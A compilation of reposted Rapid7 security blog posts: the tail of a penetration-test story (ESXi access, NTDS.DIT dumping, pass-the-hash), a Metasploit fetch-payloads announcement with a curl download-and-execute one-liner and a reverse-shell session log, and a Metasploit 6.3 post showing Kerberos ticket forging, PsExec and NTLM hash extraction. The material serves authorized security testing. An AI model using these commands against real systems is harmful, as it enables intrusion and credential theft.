So, I got into the VMware ESXi consoles and quickly identified which of the three assets contained the primary Domain Controller (DC) and Exchange Server. As an administrator of the VMware ESXi console, I had a lot of flexibility in what I could do with the virtual machines. First, I checked to see if there were sessions still open on these two assets. Both were locked and would require valid credentials to access via Remote Desktop Protocol (RDP) or similar remote access control.

I could have conducted other attacks, such as Denial of Service (DoS) by deleting the machines or turning them off, but this would immediately be noticed by organization personnel, and, most importantly, these types of attacks were out of scope. DoS is out of scope for pentesters by default: this type of attack is extremely harmful to business operations and has the potential to cause irreversible harm.

I needed an interface with administrative control to view data on these VMs, rather than trying to authenticate to the underlying operating systems (OS) within them. I tried to download the VMs, but the transfer would have taken 10+ days for the DC and multiple weeks for the Exchange Server. I tried to create a snapshot of the DC’s memory to extract credentials from it, but this file was also too large to acquire during the engagement.

I asked for help from the consulting team. At Rapid7, we have a deep bench of talented and knowledgeable people and a healthy culture of teamwork and support.

One of my teammates hopped on a call to help me investigate the potential options. Upon further review of the accessible ports and services in use by the VMware ESXi host, we found that Secure Shell (SSH) was open and accessible. There is a tool called SSHFS, which stands for SSH File System. It uses an SSH connection to mount and interact with the files on a remote device, similar to Network File System (NFS), where a user mounts a remote directory into a local one. With administrative credentials to the VMware ESXi device, SSHFS gave me administrative control over the remote file system and allowed me to interact with it in the same way as local files.
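The mount itself is a one-liner. A small sketch that builds the sshfs invocation (the host and paths are placeholders, not the client’s real values):

```python
import shlex

# Builds the sshfs invocation used to mount a remote filesystem locally; the
# host and paths are placeholders. `-o ro` mounts read-only so nothing on the
# target is modified, and `reconnect` survives dropped SSH sessions.
def sshfs_cmd(user, host, remote_dir, mountpoint):
    return shlex.join(
        ["sshfs", f"{user}@{host}:{remote_dir}", mountpoint, "-o", "ro,reconnect"]
    )

print(sshfs_cmd("root", "192.0.2.10", "/vmfs/volumes", "/mnt/esxi"))
# sshfs root@192.0.2.10:/vmfs/volumes /mnt/esxi -o ro,reconnect
```

Once mounted, the datastore behind the VMs can be browsed with ordinary file tools.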

From here, I simply navigated to the directory within the DC that contained the NTDS.DIT file. This file is the Active Directory database stored on Domain Controllers, and it contains the New Technology LAN Manager (NTLM) hashes for all of the accounts on the domain, including users, workstation machine accounts, and service accounts.

Sometimes, for environments that have or once had devices older than Windows Vista or Server 2008, there are also LM hashes which are incredibly weak. The entire keyspace for LM can be cracked in minutes to hours depending on the hardware, and the entire 8 character keyspace for NTLM can be cracked within several hours on enterprise-grade hardware.
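The arithmetic behind that claim is straightforward. A quick sketch, assuming a round hash-rate figure for a multi-GPU cracking rig rather than a measured benchmark:

```python
# The hash rate below is an assumed round number for enterprise-grade GPU
# hardware, not a benchmark from this engagement.
printable = 95              # printable ASCII characters
keyspace = printable ** 8   # every possible 8-character password
rate = 500e9                # assumed NTLM hashes per second
hours = keyspace / rate / 3600

print(f"{keyspace:,} candidates")  # 6,634,204,312,890,625 candidates
print(f"~{hours:.1f} hours to exhaust the keyspace")
```

Even quadrillions of candidates fall in an afternoon at these rates, which is why password length matters far more than complexity rules alone.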

This does not even cover the most valuable feature of NTLM authentication. NTLM hashes can be used as passwords, making it irrelevant to know the cleartext password that created the hash. This is called a “pass-the-hash” attack. Upon successfully dumping the NTDS.DIT file for the organization’s domain, I now controlled every domain-joined account and device.

With this control, I switched gears to post-exploitation and demonstrating impact for the organization’s stakeholders. I logged into several email accounts, looking for and finding sensitive information such as Social Security Numbers (SSNs) and Account Numbers. I sent emails from organizational personnel’s email accounts to the point-of-contact and myself, demonstrating the impersonation potential. I used cracked account credentials to locate accounts for which Multi-factor Authentication (MFA) had not been configured and enrolled in MFA for one account. I perused several organization-wide network file share servers finding sensitive documents, PII, account numbers, bank and loan statements, and network information. I found multiple PDFs identifying the organization’s ATMs, their names, locations, makes and models, support information from supporting third-parties, and IP addresses.

I used these ATM IP addresses to conduct additional enumeration attempting to discover attack paths to gain control of ATMs. I found several open ports but was unable to gain access or control to the ATMs. However, within the directories containing ATM information were Excel spreadsheet logs of ATM activity. These non-password-protected spreadsheets held cardholder data, their links to bank customer account numbers, and historical information such as timestamps, locations, transaction amounts, and transaction types.

The customer’s environment had a lot of time and effort dedicated to security, and the security team had covered much of the “low-hanging fruit.” Sometimes older technology like IPMI is necessary for business; it is vital to understand the risks and to work with the technology we have to secure it against well-documented attacks. Why allow anyone internal to see an administrative resource? Access controls and closing unnecessary ports could minimize the attack surface of exploitable systems. Finally, one of the best defenses continues to be a strong, unique password for every login, local or domain.

We, the pentesters at Rapid7, put our experience and knowledge together to reveal the weaknesses in the customer’s environment and give them the opportunity to fix them. Sometimes hacking is like finding a needle in a haystack, but we hackers have automated needle-finding, haystack-searching machines. Do your research, do the best you can, and when in doubt, get a pentest!


Fetch Payloads: A Shorter Path from Command Injection to Metasploit Session

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/05/25/fetch-payloads-a-shorter-path-from-command-injection-to-metasploit-session/

Fetch Payloads: A Shorter Path from Command Injection to Metasploit Session

Over the last year, two-thirds of the exploit modules added to Metasploit Framework have targeted command injection vulnerabilities (CWE-78: Improper Neutralization of Special Elements used in an OS Command). In the process of helping new and existing open-source contributors learn how to use Metasploit’s command stager toolset, we’ve recognized that while command stagers are powerful, they have a high learning curve.

So, we added a new type of payload to help contributors move as quickly as possible from vulnerability to module and users to have more control over the commands executed. We’re pleased to announce the availability of fetch payloads, which simplify and replace some of the command stager use cases, providing for faster, more intuitive command injection module development and offering a useful new on-the-fly hacking tool.

Fetch payloads are command-based payloads that leverage network-enabled commands (cURL, certutil, ftp, tftp, wget) on remote targets to transfer and execute binary payloads quickly and easily. Previously, some of the functionality of fetch payloads could be accomplished within an exploit module by using command stagers, but fetch payloads give greater flexibility for staging payloads with network-based commands and allow command staging of payloads independently of Metasploit modules.

Command stagers are still the correct choice for staging payloads through commands that do not use networking, like echo or printf, but otherwise, we encourage you to check out fetch payloads when you write your next command injection module—or the next time you need to upload and execute a payload when you already have a shell on a target. You may have performed this manually in the past using Python’s built-in HTTP server, msfvenom, and Metasploit Framework. Now we do it all for you.
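The manual workflow that fetch payloads automate can be sketched with nothing but the Python standard library: serve a file over HTTP, then pull it down with a network-enabled command on the target. The payload bytes and URL path here are stand-ins:

```python
import http.server
import threading
import urllib.request

# Stand-in for an msfvenom-generated payload; real bytes would come from a
# command like `msfvenom -p <payload> -f elf -o payload`
PAYLOAD = b"\x7fELF..."

class Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the payload bytes for any requested path
        self.send_response(200)
        self.send_header("Content-Length", str(len(PAYLOAD)))
        self.end_headers()
        self.wfile.write(PAYLOAD)

    def log_message(self, *args):  # keep the demo quiet
        pass

httpd = http.server.HTTPServer(("127.0.0.1", 0), Handler)
port = httpd.server_address[1]
threading.Thread(target=httpd.serve_forever, daemon=True).start()

# On the target, the equivalent one-liner would be something like:
#   curl -so /tmp/payload http://ATTACKER:PORT/payload && /tmp/payload
body = urllib.request.urlopen(f"http://127.0.0.1:{port}/payload").read()
print(body == PAYLOAD)  # True
httpd.shutdown()
```

Fetch payloads bundle the payload generation, the server, the one-liner, and the handler into a single step.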

Fetch payloads have two core use cases: upgrading a shell to a Metasploit session, and serving as the payload in command injection exploit modules. We explore both in more detail below.

Using Fetch Payloads Manually From A Shell

In this use case, we will upgrade a shell on a host (any shell, not just a Metasploit Framework shell) to a Metasploit session.

The shell session:

tmoose@ubuntu:~/rapid7/metasploit-framework$ nc -lv 10.5.135.201 4585
Listening on ubuntu 4585
Connection received on 10.5.134.167 64613
Microsoft Windows [Version 10.0.17134.1]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\msfuser\Downloads>

Now, hop over to a Metasploit Framework instance reachable by that host and set up a fetch payload. You’ll need to decide five things:

The protocol you want to use (HTTP, HTTPS, and TFTP are currently supported)
The binary Metasploit payload you want to deliver
The command you want to use on the remote host to download the payload
The IP:PORT you want to use to serve the binary payload
The IP:PORT you want the binary payload to use

The first two items above determine the fetch payload we want to use: we are using cmd/windows/http/x64/meterpreter/reverse_tcp which will host a windows/x64/meterpreter/reverse_tcp binary payload on an HTTP server. We’re almost halfway done just by selecting the payload!

You can visualize the fetch payload names like this:

Command payload    Platform    Networking Protocol    Underlying payload
cmd/               windows/    http/                  x64/meterpreter/reverse_tcp

The other three values are set as options within the payload. We will use the default ports and leave the default cURL command, so we just need to set LHOST so the binary payload knows where to call back, and FETCH_SRVHOST to tell the fetch command where to download the payload from and Framework where to host it:

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > show options

Module options (payload/cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      NdqujpmEtq       no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       0.0.0.0          yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port

View the full module info with the info, or info -d command.

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST 10.5.135.201
FETCH_SRVHOST => 10.5.135.201
msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > set LHOST 10.5.135.201
LHOST => 10.5.135.201

That’s it. No further setup is needed unless you want to customize. You can see that there are other options: FETCH_DELETE will attempt to delete the file after it executes, and FETCH_WRITABLE_DIR and FETCH_FILENAME tell the fetch payload where to store the file on the remote host (in case there is a safe directory elsewhere that evades logging or antivirus). Users can also change the FETCH_URIPATH value where the underlying payload is served, but by default the value is generated automatically from the underlying payload: if a user creates a fetch payload in msfvenom and a listener in Framework, the default FETCH_URIPATH values will match as long as the underlying payload is the same. Now, just like any payload, we can call generate or use msfvenom to create the command we need to execute on the remote host:

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > generate -f raw

[*] Command to run on remote host: curl -so %TEMP%\NdqujpmEtq.exe http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w & start /B %TEMP%\NdqujpmEtq.exe
curl -so %TEMP%\NdqujpmEtq.exe http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w & start /B %TEMP%\NdqujpmEtq.exe

Also, the command appears when you start the handler:

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > to_handler

[*] Command to run on remote host: curl -so %TEMP%\KphvDFGglOzp.exe http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w & start /B %TEMP%\KphvDFGglOzp.exe
[*] Payload Handler Started as Job 0
[*] Fetch Handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /dOVx5JNISsHZ3V06TolS4w
[*] Started reverse TCP handler on 10.5.135.201:4444 

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) >

For fetch payloads, to_handler does several things:

  • Creates the underlying payload in an executable format based on the platform selected; since we’re using Windows, the payload is created as an exe file.
  • Starts a server based on the protocol for the specific fetch payload selected
  • Adds the executable payload to the server
  • Creates a one-liner to download and execute the payload on target

All the user needs to do is copy/paste the command and hit enter:

C:\Users\msfuser\Downloads>curl -so %TEMP%\KphvDFGglOzp.exe http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w & start /B %TEMP%\KphvDFGglOzp.exe

That will use cURL to download the payload and execute it:

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > 
[*] Client 10.5.134.167 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.134.167 (curl/7.55.1)
[*] Sending stage (200774 bytes) to 10.5.134.167
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.167:64681) at 2023-05-18 12:39:12 -0500
sessions

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  1         meterpreter x64/windows  DESKTOP-D1E425Q\msfuser @ DESKTOP-D1E425Q  10.5.135.201:4444 -> 10.5.134.167:64681 (10.5.134.1
                                                                                67)

msf6 payload(cmd/windows/http/x64/meterpreter/reverse_tcp) > 

Using Fetch Payloads in a Metasploit Module

Module authors probably already see the utility in command injection modules. Framework’s command stagers are very powerful, but they also present a non-trivial barrier to entry. Using fetch payloads in a Metasploit module is straightforward: authors set the module’s Platform to linux or win and its Arch to ARCH_CMD. Then, when it comes time to get the command that must run on the remote target, simply invoke payload.encoded. Below is a bare-bones template of a module using fetch payloads against a Linux web server with a command injection vulnerability:

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Module Name',
        'Description' => %q{ 1337 },
        'License' => MSF_LICENSE,
        'Author' => [ 'you' ],
        'References' => [],
        'Platform' => 'linux',
        'Arch' => ARCH_CMD,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
          'RPORT' => 80,
          'FETCH_COMMAND' => 'WGET'
        },
        'Targets' => [ [ 'Default', {} ] ],
        'DisclosureDate' => '2022-01-26',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
        }
      )
    )
    register_options(
      [
        Msf::OptString.new('TARGET_URI', [ false, 'URI', '/hackme'])
      ]
    )
  end

  def execute_command(cmd)
    # Whatever it takes to execute a cmd on target
  end

  def check
    # Put your check method here
  end

  def exploit
    execute_command(payload.encoded)
  end
end

That’s it. With fetch payloads, Metasploit Framework will set up the server, make the executable payload, start the payload handler, serve the payload, handle the callback, and provide the command that needs to be executed; all you’ve got to do is tell it how to execute a command and then write a check method.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.

To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Framework 6.3 Released

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/01/30/metasploit-framework-6-3-released/

Metasploit Framework 6.3 Released

The Metasploit team is pleased to announce the release of Metasploit Framework 6.3, which adds native support for Kerberos authentication, incorporates new modules to conduct a wide range of Active Directory attacks, and simplifies complex workflows to support faster and more intuitive security testing.

Background

Kerberos is an authentication protocol that is commonly used to verify the identity of a user or a host in Windows environments. Kerberos support is built into most operating systems, but it’s best known as the authentication protocol used in Active Directory implementations. Thousands of organizations worldwide rely on Active Directory to define user groups and permissions and to provision network resources.

Kerberos and Active Directory more broadly have been prime attack targets for years and have featured prominently in both threat actor and pen tester playbooks. A fresh wave of Active Directory attacks proliferated in mid-2021, after researchers Will Schroeder and Lee Christensen published a technical whitepaper on a slew of novel attack techniques targeting Active Directory Certificate Services (AD CS). AD CS is a popular tool that allows administrators to implement public key infrastructure, and to issue and manage public key certificates. Abusing AD CS gave adversaries and red teams fresh opportunities to escalate privileges, move laterally, and establish persistence within Windows environments.

More than ever, first-class support for Active Directory and Kerberos-based attack techniques is critical to many pen testers and security researchers as they look to demonstrate risk to clients and the public. Plenty of new tooling has sprung up to facilitate offensive security operations in this space, but much of that tooling requires operators to manage their own tickets and environment variables, and/or is too narrowly scoped to support end-to-end attack workflows. As a result, many operators find themselves using multiple purpose-built tools to accomplish specific pieces of their playbooks, and then having to track ticket information manually to pursue broader objectives.

New in Metasploit 6.3

Metasploit Framework 6.3 streamlines Kerberos and Active Directory attack workflows by allowing users to authenticate to multiple services via Kerberos and build attack chains with new modules that request, forge, and convert tickets between formats for use in other tools. Tickets are cached and stored in the Metasploit database as loot, which removes the need for manual management of environment variables. Attack workflows support pivoting over sessions out of the box, as users expect from Metasploit.

Highlights include:

  • Native Kerberos authentication over HTTP, LDAP, MSSQL, SMB, and WinRM
  • The ability to request Ticket-Granting Tickets (TGT) and service tickets (TGS) from the Key Distribution Center (KDC) if the user obtains a password, NT hash, or encryption key; users can also request tickets via PKINIT with certificates issued from AD CS
  • Kerberos ticket inspection and debugging via the auxiliary/admin/kerberos/inspect_ticket module and the auxiliary/admin/kerberos/keytab module, which can generate Keytab files to allow decryption of Kerberos network traffic in Wireshark
  • Fully automated privilege escalation via Certifried (CVE-2022–26923)

MSF 6.3 also includes new modules for key attack primitives in Active Directory Domain Services (AD DS) environments, including creation of computer accounts, abuse of Role Based Constrained Delegation (RBCD), and enumeration of 28 key data points via LDAP.

In recent years, adversaries have frequently abused misconfigurations in AD CS to escalate privileges and maintain access to networks. Metasploit 6.3 adds new modules to find and execute certificate attacks.

Additional features and improvements since Metasploit 6.2 include:

  • A sixth getsystem technique that leverages the EFSRPC API to elevate a user with the SeImpersonatePrivilege permission to NT AUTHORITY\SYSTEM ("EfsPotato")
  • Better Linux credential extraction through native Mimipenguin support in Metasploit
  • Meterpreter support for running Cobalt Strike’s Beacon Object Files (BOF) — many thanks to the TrustedSec team!
  • A rewrite of Metasploit’s datastore to resolve common errors, address edge cases, and improve user quality of life
  • Updated show options support that lets module authors specify the conditions under which options are relevant to the user (e.g., a particular action or datastore value being set)

Example workflows

Below are some sample workflows for common actions supported in Metasploit 6.3. Additional workflows and context on Kerberos have been documented on the Metasploit docs site. This documentation is open-source, and contributions are welcome.

Kerberos Service Authentication

Opening a WinRM session:

msf6 > use auxiliary/scanner/winrm/winrm_login
msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local

[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:5985   - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:5985   - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[+] 192.168.123.13:88 - Received AP-REQ. Extracting session key...
[+] 192.168.123.13:5985 - Login Successful: demo.local\Administrator:p4$$w0rd
[*] Command shell session 1 opened (192.168.123.1:50722 -> 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1
[*] Starting interaction with 1...

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Administrator>

Querying LDAP for accounts:

msf6 > use auxiliary/gather/ldap_query
msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
[*] Running module against 192.168.123.13

[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 192.168.123.13:389 Discovered base DN: DC=adf3,DC=local
CN=Administrator CN=Users DC=adf3 DC=local
==========================================

 Name                Attributes
 ----                ----------
 badpwdcount         0
 pwdlastset          133184302034979121
 samaccountname      Administrator
 useraccountcontrol  512
 ... etc ...

Running PsExec against a host:

msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'...
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] 192.168.123.13:445 - Selecting PowerShell target
[*] 192.168.123.13:445 - Executing the payload...
[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Meterpreter session 6 opened (192.168.123.1:4444 -> 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000

meterpreter >

Connecting to a Microsoft SQL Server instance and running a query:

msf6 > use auxiliary/admin/mssql/mssql_sql
msf6 auxiliary(admin/mssql/mssql_sql) > rerun 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssql::domain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
[*] Reloading module...
[*] Running module against 192.168.123.13

[*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response
[+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response
[*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin
[*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid
[*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193)

 auth_scheme
 -----------
 KERBEROS

[*] Auxiliary module execution completed

Kerberos klist support

When running Metasploit with a database, all Kerberos tickets will be persisted into the database. The klist command can be used to view these persisted tickets. It is a top-level command and can be run even if a module is in use:

msf6 > klist
Kerberos Cache
==============
host            principal               sname                              issued                     status       path
----            ---------               -----                              ------                     ------       ----
192.168.159.10  [email protected]  krbtgt/[email protected]   2022-12-15 18:25:48 -0500  >>expired<<  /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_867855.bin
192.168.159.10  [email protected]  cifs/[email protected]  2022-12-15 18:25:48 -0500  >>expired<<  /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_699376.bin
192.168.159.10  [email protected]  krbtgt/[email protected]   2022-12-16 14:51:50 -0500  valid        /home/smcintyre/.msf4/loot/20221216145149_default_192.168.159.10_mit.kerberos.cca_782487.bin
192.168.159.10  [email protected]  cifs/[email protected]  2022-12-16 17:07:48 -0500  valid        /home/smcintyre/.msf4/loot/20221216170747_default_192.168.159.10_mit.kerberos.cca_156303.bin
192.168.159.10  [email protected]  cifs/[email protected]               2022-12-16 17:08:26 -0500  valid        /home/smcintyre/.msf4/loot/20221216170825_default_192.168.159.10_mit.kerberos.cca_196712.bin
192.168.159.10  [email protected]  krbtgt/[email protected]   2022-12-16 15:03:03 -0500  valid        /home/smcintyre/.msf4/loot/20221216150302_default_192.168.159.10_mit.kerberos.cca_729805.bin
192.168.159.10  [email protected]    krbtgt/[email protected]   2022-12-16 15:25:16 -0500  valid        /home/smcintyre/.msf4/loot/20221216152515_default_192.168.159.10_mit.kerberos.cca_934698.bin

The klist command also supports the -v flag for showing additional detail.

Requesting tickets

The auxiliary/admin/kerberos/get_ticket module can be used to request TGT/TGS tickets from the KDC. For instance, the following example requests a TGS impersonating the Administrator account:

msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true rhosts=10.0.0.24 domain=mylab.local user=serviceA password=123456 action=GET_TGS spn=cifs/dc02.mylab.local impersonate=Administrator
[*] Running module against 10.0.0.24

[*] 10.0.0.24:88 - Getting TGS impersonating [email protected] (SPN: cifs/dc02.mylab.local)
[+] 10.0.0.24:88 - Received a valid TGT-Response
[*] 10.0.0.24:88 - TGT MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_667626.bin
[+] 10.0.0.24:88 - Received a valid TGS-Response
[+] 10.0.0.24:88 - Received a valid TGS-Response
[*] 10.0.0.24:88 - TGS MIT Credential Cache saved to /home/msfuser/.msf4/loot/20221201210211_default_10.0.0.24_mit.kerberos.cca_757041.bin
[*] Auxiliary module execution completed

The auxiliary/admin/kerberos/get_ticket module also supports authentication via PKINIT with the CERT_FILE and CERT_PASSWORD options. When used with the GET_HASH action, a user-to-user (U2U) authentication TGS will be requested, from which the NT hash can be calculated. This allows a user to obtain the NTLM hash for the account for which the certificate was issued.

msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhosts=192.168.159.10 cert_file=/home/smcintyre/.msf4/loot/20230126155141_default_192.168.159.10_windows.ad.cs_404736.pfx
[*] Running module against 192.168.159.10

[+] 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_813470.bin
[*] 192.168.159.10:88 - Getting NTLM hash for [email protected]
[+] 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:88 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_485504.bin
[+] Found NTLM hash for smcintyre: aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket) >
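For context on the GET_HASH action above: an NT hash is simply the MD4 digest of the UTF-16LE-encoded password. A minimal pure-Python sketch follows (MD4 is implemented from scratch here because modern OpenSSL builds often disable it, so hashlib.new('md4') may be unavailable):

```python
import struct

def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    # RFC 1320 padding: 0x80, zeros until length % 64 == 56, then the
    # original bit length as a 64-bit little-endian integer.
    msg = bytearray(data) + b'\x80'
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack('<Q', len(data) * 8)

    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15],
         (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15],
         (3, 9, 11, 15)),
    )
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack('<16I', bytes(msg[off:off + 64]))
        a, b, c, d = A, B, C, D
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                s = shifts[i % 4]
                if i % 4 == 0:
                    a = _lrot((a + func(b, c, d) + X[k] + const) & 0xFFFFFFFF, s)
                elif i % 4 == 1:
                    d = _lrot((d + func(a, b, c) + X[k] + const) & 0xFFFFFFFF, s)
                elif i % 4 == 2:
                    c = _lrot((c + func(d, a, b) + X[k] + const) & 0xFFFFFFFF, s)
                else:
                    b = _lrot((b + func(c, d, a) + X[k] + const) & 0xFFFFFFFF, s)
        A, B, C, D = ((A + a) & 0xFFFFFFFF, (B + b) & 0xFFFFFFFF,
                      (C + c) & 0xFFFFFFFF, (D + d) & 0xFFFFFFFF)
    return struct.pack('<4I', A, B, C, D)

def nt_hash(password: str) -> str:
    # The NT hash is MD4 over the password's UTF-16LE encoding.
    return md4(password.encode('utf-16-le')).hex()

print(nt_hash('password'))  # 8846f7eaee8fb117ad06bdd830b7586c
```

The well-known empty-password NT hash, 31d6cfe0d16ae931b73c59d7e0c089c0, is exactly md4(b'').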

Forging tickets

After compromising a KDC or service account, users can forge Kerberos tickets for persistence. The auxiliary/admin/kerberos/forge_ticket module can forge Golden Tickets with the KRBTGT account hash, or Silver Tickets with service hashes:

msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_SILVER domain=demo.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=fbd103200439e14d4c8adad675d5f244 user=Administrator spn=cifs/dc3.demo.local

[+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin
[*] Auxiliary module execution completed

Kerberos debugging support

Metasploit 6.3 also introduces new tools that will make it easier for module developers and researchers to target Kerberos environments.

The new auxiliary/admin/kerberos/inspect_ticket module can show the contents of a Kerberos ticket, including decryption support if the key is known after running the auxiliary/gather/windows_secrets_dump module or similar:

msf6 > use auxiliary/admin/kerberos/inspect_ticket
